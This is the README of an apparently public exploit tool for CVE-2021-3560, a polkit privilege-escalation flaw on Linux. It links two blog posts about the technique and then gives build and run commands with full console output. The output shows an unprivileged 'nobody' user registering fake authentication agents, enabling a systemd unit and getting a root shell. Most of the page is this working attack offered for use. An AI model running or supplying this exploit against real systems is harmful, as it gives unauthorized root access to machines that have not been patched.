Awesome
PolicyKit CVE-2021-3560 Exploit (Authentication Agent)
Technology Details
Blog posts about this exploit :
- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt
- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation
Build & Usage
nobody@test:/tmp/CVE-2021-3560$ go build
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267920 - [*] Registering PolicyKit authentication agent ...
...
pid-267915 - [-] Exploit failed, please try again
nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service
=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===
pid-267963 - [*] Registering PolicyKit authentication agent ...
pid-267963 - [*] Authentication agent main loop running ...
pid-267968 - [*] Registering PolicyKit authentication agent ...
pid-267973 - [*] Registering PolicyKit authentication agent ...
pid-267968 - [*] Authentication agent main loop running ...
pid-267973 - [*] Authentication agent main loop running ...
pid-267963 - [*] Starting systemd service 'pwnkit.service' ...
pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ...
pid-267973 - [*] Reloading systemd daemon ...
pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units'
pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a
pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files'
pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80
pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon'
pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2
pid-267958 - [+] File exists, popping root shell ...
pwned-5.0# id
uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup)
License
Apache License